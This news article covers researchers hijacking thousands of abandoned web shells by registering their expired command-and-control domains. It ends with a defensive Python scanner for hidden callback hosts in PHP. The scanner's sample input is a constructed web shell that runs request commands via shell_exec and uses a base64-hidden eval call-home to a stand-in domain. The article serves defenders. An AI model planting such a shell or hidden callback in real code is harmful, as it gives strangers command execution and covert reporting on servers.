Hackers’ Abandoned Domains Expose 4,000 Active Backdoors for Just $20 Each

Web Backdoor Hijacking Exposes Global Security Vulnerabilities

Researchers at watchTowr Labs have taken control of more than 4,000 live web backdoors by buying up the expired domains those backdoors still call home to. Working with the Shadowserver Foundation, the team registered over 40 domain names that threat actors had once used for command-and-control and then allowed to lapse; the compromised hosts, still configured to contact those domains, now report to the researchers instead.

The compromised hosts included government systems in Bangladesh, China, and Nigeria, as well as academic institutions across Asia. The hijacked backdoors were web shells of several kinds, including:
– Simple PHP one-liners that pass a request parameter to a command-execution function
– c99shell and r57shell (feature-rich shells with file management, database access, and command execution)
– China Chopper (a small server-side shell commonly used by Chinese APT groups)

Key Findings:
– Some web shells were themselves backdoored by their authors: a hidden callback to a hard-coded domain means whoever controls that domain can reach every site running the shell
– Compromised systems included government, military, and educational institutions
– The operation cost as little as $20 per domain
– Over 135,000 unique systems were identified still communicating with legacy domains

The research points to a basic operational failure: the attackers let the domains their tools depend on expire, so anyone willing to pay the registration fee could inherit their access. Threat actors, in other words, make the same mistakes defenders do: they lose track of expiring domains, and they deploy software (here, web shells obtained from public sources) that is itself backdoored.
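The hidden callback described above is what makes an expired domain worth $20 to whoever registers it, and it is also what a defender can look for. The following Python script is an added example, not code from watchTowr or from any of the shells named in this article: it scans PHP source for outbound hostnames, including ones that only appear after decoding an embedded base64 blob (the usual hiding place for a call-home in a backdoored shell). The sample web shell and its domain (`update-check.example.invalid`) are constructed for the example.

```python
import base64
import re

# --- Constructed sample input (not a real web shell) -----------------------
# A minimal PHP web shell: the visible line runs an attacker-supplied command;
# the eval(base64_decode(...)) line hides a call-out to a hard-coded domain
# that the person who backdoored the shell would have controlled. The domain
# uses the reserved .invalid TLD and is made up for this example.
HIDDEN_PHP = (
    b'@file_get_contents("http://update-check.example.invalid/ping?h="'
    b'.urlencode($_SERVER["HTTP_HOST"]));'
)
SAMPLE_SHELL = (
    b"<?php\n"
    b"if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); }\n"
    b"eval(base64_decode('" + base64.b64encode(HIDDEN_PHP) + b"'));\n"
)

# Hostname of any http(s) URL in the text.
URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I)
# Runs of base64 alphabet long enough to be worth decoding.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")


def find_callbacks(src: bytes, depth: int = 3) -> dict[str, str]:
    """Map each outbound hostname found in src to where it was found:
    'plain' if visible in the source, 'base64' if it only appears after
    decoding an embedded base64 blob (nested blobs are followed to `depth`)."""
    found = {m.group(1).decode().lower(): "plain" for m in URL_RE.finditer(src)}
    if depth == 0:
        return found
    for blob in B64_RE.findall(src):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # bad padding or not really base64
            continue
        for host in find_callbacks(decoded, depth - 1):
            found.setdefault(host, "base64")
    return found


def triage(src: bytes, expected_hosts: frozenset[str] = frozenset()) -> list[str]:
    """Return the hosts a reviewer should look at: every outbound host that is
    not on the expected list, annotated with whether it was hidden by encoding."""
    return [
        f"{host} ({where})"
        for host, where in sorted(find_callbacks(src).items())
        if host not in expected_hosts
    ]


if __name__ == "__main__":
    for line in triage(SAMPLE_SHELL):
        print("callback host:", line)
```

Run against the constructed shell, the script reports `update-check.example.invalid (base64)`: the domain never appears in the readable source, which is exactly why a quick grep for URLs misses it. Any host this surfaces on a production web server deserves a WHOIS lookup, since an unregistered or recently re-registered domain is the scenario this article describes.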

The affected domains have since been sinkholed with Shadowserver so that nobody else can pick them up. For defenders, the practical lesson is twofold: keep track of the domains your own infrastructure depends on before they expire, and treat any web shell found on a server as reachable not just by whoever planted it but by whoever ends up owning the domains it calls out to.